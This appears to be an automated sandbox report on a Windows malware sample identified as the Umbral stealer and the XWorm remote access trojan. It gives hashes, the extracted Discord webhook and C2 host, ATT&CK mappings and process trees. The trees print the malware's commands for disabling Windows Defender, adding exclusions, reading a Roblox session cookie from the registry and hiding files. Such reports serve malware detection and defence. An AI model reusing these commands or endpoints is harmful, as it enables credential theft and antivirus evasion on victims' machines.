umbral | 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce

Analysis

max time kernel
125s
max time network
135s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-11-2024 02:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
Size

800KB
MD5

7198fa10a50ea9aaf6ae5c2a05af2104
SHA1

c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
SHA512

56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
SSDEEP

12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0

Score

10^/10

umbral xworm discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o

Extracted

Family

xworm

127.0.0.1:26848

23.ip.gl.ply.gg:26848

Attributes

Install_directory
%Userprofile%
install_file
Windows Security Host.exe

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Injector.exe	family_umbral
behavioral1/memory/1592-11-0x0000000000C80000-0x0000000000CC0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe	family_xworm
behavioral1/memory/2948-16-0x0000000000BE0000-0x0000000000BFA000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1844	powershell.exe
2652	powershell.exe
2924	powershell.exe
536	powershell.exe
296	powershell.exe
2192	powershell.exe
1100	powershell.exe
2408	powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

Injector.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe

Drops startup file 2 IoCs

Processes:

Windows Security Host.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe

Executes dropped EXE 4 IoCs

Processes:

Injector.exeWindows Security Host.exeBootstrapperV1.23.exe

pid process

1592 Injector.exe
2948 Windows Security Host.exe
2164 BootstrapperV1.23.exe
1160

pid	process
1592	Injector.exe
2948	Windows Security Host.exe
2164	BootstrapperV1.23.exe
1160

Loads dropped DLL 7 IoCs

Processes:

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exeWerFault.exe

pid	process
2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
2708
2888	WerFault.exe
2888	WerFault.exe
2888	WerFault.exe
2888	WerFault.exe
2888	WerFault.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Windows Security Host.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

12 discord.com
13 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

1184 cmd.exe
2816 PING.EXE
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

2944 wmic.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

2852 ipconfig.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2816 PING.EXE

flow	ioc
12	discord.com
13	discord.com

flow	ioc
6	ip-api.com

pid	process
1184	cmd.exe
2816	PING.EXE

pid	process
2944	wmic.exe

pid	process
2852	ipconfig.exe

pid	process
2816	PING.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exeInjector.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWindows Security Host.exe

pid	process
2652	powershell.exe
2924	powershell.exe
1592	Injector.exe
536	powershell.exe
296	powershell.exe
2192	powershell.exe
1844	powershell.exe
1100	powershell.exe
1152	powershell.exe
2948	Windows Security Host.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Windows Security Host.exeInjector.exepowershell.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2948	Windows Security Host.exe
Token: SeDebugPrivilege	1592	Injector.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeIncreaseQuotaPrivilege	2444	wmic.exe
Token: SeSecurityPrivilege	2444	wmic.exe
Token: SeTakeOwnershipPrivilege	2444	wmic.exe
Token: SeLoadDriverPrivilege	2444	wmic.exe
Token: SeSystemProfilePrivilege	2444	wmic.exe
Token: SeSystemtimePrivilege	2444	wmic.exe
Token: SeProfSingleProcessPrivilege	2444	wmic.exe
Token: SeIncBasePriorityPrivilege	2444	wmic.exe
Token: SeCreatePagefilePrivilege	2444	wmic.exe
Token: SeBackupPrivilege	2444	wmic.exe
Token: SeRestorePrivilege	2444	wmic.exe
Token: SeShutdownPrivilege	2444	wmic.exe
Token: SeDebugPrivilege	2444	wmic.exe
Token: SeSystemEnvironmentPrivilege	2444	wmic.exe
Token: SeRemoteShutdownPrivilege	2444	wmic.exe
Token: SeUndockPrivilege	2444	wmic.exe
Token: SeManageVolumePrivilege	2444	wmic.exe
Token: 33	2444	wmic.exe
Token: 34	2444	wmic.exe
Token: 35	2444	wmic.exe
Token: SeIncreaseQuotaPrivilege	2444	wmic.exe
Token: SeSecurityPrivilege	2444	wmic.exe
Token: SeTakeOwnershipPrivilege	2444	wmic.exe
Token: SeLoadDriverPrivilege	2444	wmic.exe
Token: SeSystemProfilePrivilege	2444	wmic.exe
Token: SeSystemtimePrivilege	2444	wmic.exe
Token: SeProfSingleProcessPrivilege	2444	wmic.exe
Token: SeIncBasePriorityPrivilege	2444	wmic.exe
Token: SeCreatePagefilePrivilege	2444	wmic.exe
Token: SeBackupPrivilege	2444	wmic.exe
Token: SeRestorePrivilege	2444	wmic.exe
Token: SeShutdownPrivilege	2444	wmic.exe
Token: SeDebugPrivilege	2444	wmic.exe
Token: SeSystemEnvironmentPrivilege	2444	wmic.exe
Token: SeRemoteShutdownPrivilege	2444	wmic.exe
Token: SeUndockPrivilege	2444	wmic.exe
Token: SeManageVolumePrivilege	2444	wmic.exe
Token: 33	2444	wmic.exe
Token: 34	2444	wmic.exe
Token: 35	2444	wmic.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe
Token: SeDebugPrivilege	2036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2036	WMIC.exe
Token: SeRemoteShutdownPrivilege	2036	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Windows Security Host.exe

pid process

2948 Windows Security Host.exe

pid	process
2948	Windows Security Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exeBootstrapperV1.23.execmd.exeWindows Security Host.exeInjector.execmd.exe

description	pid	process	target process
PID 2528 wrote to memory of 1592	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Injector.exe
PID 2528 wrote to memory of 1592	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Injector.exe
PID 2528 wrote to memory of 1592	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Injector.exe
PID 2528 wrote to memory of 2948	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Windows Security Host.exe
PID 2528 wrote to memory of 2948	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Windows Security Host.exe
PID 2528 wrote to memory of 2948	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	Windows Security Host.exe
PID 2528 wrote to memory of 2164	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	BootstrapperV1.23.exe
PID 2528 wrote to memory of 2164	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	BootstrapperV1.23.exe
PID 2528 wrote to memory of 2164	2528	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	BootstrapperV1.23.exe
PID 2164 wrote to memory of 2764	2164	BootstrapperV1.23.exe	cmd.exe
PID 2164 wrote to memory of 2764	2164	BootstrapperV1.23.exe	cmd.exe
PID 2164 wrote to memory of 2764	2164	BootstrapperV1.23.exe	cmd.exe
PID 2764 wrote to memory of 2852	2764	cmd.exe	ipconfig.exe
PID 2764 wrote to memory of 2852	2764	cmd.exe	ipconfig.exe
PID 2764 wrote to memory of 2852	2764	cmd.exe	ipconfig.exe
PID 2948 wrote to memory of 2652	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 2652	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 2652	2948	Windows Security Host.exe	powershell.exe
PID 1592 wrote to memory of 2444	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2444	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2444	1592	Injector.exe	wmic.exe
PID 2948 wrote to memory of 2924	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 2924	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 2924	2948	Windows Security Host.exe	powershell.exe
PID 1592 wrote to memory of 1444	1592	Injector.exe	attrib.exe
PID 1592 wrote to memory of 1444	1592	Injector.exe	attrib.exe
PID 1592 wrote to memory of 1444	1592	Injector.exe	attrib.exe
PID 1592 wrote to memory of 536	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 536	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 536	1592	Injector.exe	powershell.exe
PID 2948 wrote to memory of 296	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 296	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 296	2948	Windows Security Host.exe	powershell.exe
PID 1592 wrote to memory of 2192	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 2192	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 2192	1592	Injector.exe	powershell.exe
PID 2948 wrote to memory of 1844	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 1844	2948	Windows Security Host.exe	powershell.exe
PID 2948 wrote to memory of 1844	2948	Windows Security Host.exe	powershell.exe
PID 1592 wrote to memory of 1100	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 1100	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 1100	1592	Injector.exe	powershell.exe
PID 2164 wrote to memory of 1852	2164	BootstrapperV1.23.exe	cmd.exe
PID 2164 wrote to memory of 1852	2164	BootstrapperV1.23.exe	cmd.exe
PID 2164 wrote to memory of 1852	2164	BootstrapperV1.23.exe	cmd.exe
PID 1852 wrote to memory of 2036	1852	cmd.exe	WMIC.exe
PID 1852 wrote to memory of 2036	1852	cmd.exe	WMIC.exe
PID 1852 wrote to memory of 2036	1852	cmd.exe	WMIC.exe
PID 1592 wrote to memory of 1152	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 1152	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 1152	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 984	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 984	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 984	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 3008	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 3008	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 3008	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2536	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2536	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2536	1592	Injector.exe	wmic.exe
PID 1592 wrote to memory of 2408	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 2408	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 2408	1592	Injector.exe	powershell.exe
PID 1592 wrote to memory of 2944	1592	Injector.exe	wmic.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1444 attrib.exe

pid	process
1444	attrib.exe

C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
"C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2528
- C:\Users\Admin\AppData\Local\Temp\Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:1444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1152
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:984
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3008
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2408
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2944
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1184
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2816
- C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\system32\cmd.exe
    "cmd" /c ipconfig /all
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:2852
- - C:\Windows\system32\cmd.exe
    "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2036
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2164 -s 1120
    3⤵
    - Loads dropped DLL
    PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe

Filesize
800KB

MD5
02c70d9d6696950c198db93b7f6a835e

SHA1
30231a467a49cc37768eea0f55f4bea1cbfb48e2

SHA256
8f2e28588f2303bd8d7a9b0c3ff6a9cb16fa93f8ddc9c5e0666a8c12d6880ee3

SHA512
431d9b9918553bff4f4a5bc2a5e7b7015f8ad0e2d390bb4d5264d08983372424156524ef5587b24b67d1226856fc630aaca08edc8113097e0094501b4f08efeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
229KB

MD5
3882cfe50e35985982e9ef0c01b99c47

SHA1
6e09c71ae230b839163628c9179b3a3aac58c1a3

SHA256
da73db144e8035dd81ab4578b7f856131351ec33119c9ce0c46d852499621636

SHA512
a539767dc599b8a6103c413b4a42c83c7ce09d3171c45890f2630ad000166854c5ac220f78ab966ea90c55c1d6361ce70ea5ab3671fc2913445e8009126a534e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe

Filesize
79KB

MD5
c7ba63ce2ed6d0aab93ad839e0eddd68

SHA1
087ffd969b37a73b349a81af18bb51191eb42cbd

SHA256
84be55fb4b514ebdb999b5caf4e0837c521b5e7a4f85f636e4593daf09eedae9

SHA512
9f63cfdb94af23cebc85ffd491364c1a90ab90736fc8da0fe16ebf2fb18e9a6eb8fea4dfca87d8353565ba684b0c8f461371588aac72101b355886619bf672f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a59c3be720b49071f7c424549be1cc88

SHA1
0e63dcde41dcf2137fcf3ca865bc42aa2e42c8df

SHA256
7c42c4c95d48c2795520203b1ba21cabb7f7c8d959888c32e0d750f0d1643614

SHA512
25604991b3326220cf10920769decd3688802d5601daa222ecc76a59b0be0380229d082a75c5d132e1c2fa74fe072c5cb56e1785edc7f38ef2b6f1e3e66c1cfb

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1592-21-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

Filesize
9.9MB

Download
memory/1592-90-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

Filesize
9.9MB

Download
memory/1592-11-0x0000000000C80000-0x0000000000CC0000-memory.dmp

Filesize
256KB

Download
memory/2164-24-0x0000000001350000-0x000000000141E000-memory.dmp

Filesize
824KB

Download
memory/2192-54-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2528-0-0x000007FEF6643000-0x000007FEF6644000-memory.dmp

Filesize
4KB

Download
memory/2528-20-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

Filesize
9.9MB

Download
memory/2528-1-0x00000000011B0000-0x0000000001222000-memory.dmp

Filesize
456KB

Download
memory/2528-3-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

Filesize
9.9MB

Download
memory/2652-31-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2652-30-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2924-38-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/2924-37-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2948-16-0x0000000000BE0000-0x0000000000BFA000-memory.dmp

Filesize
104KB

Download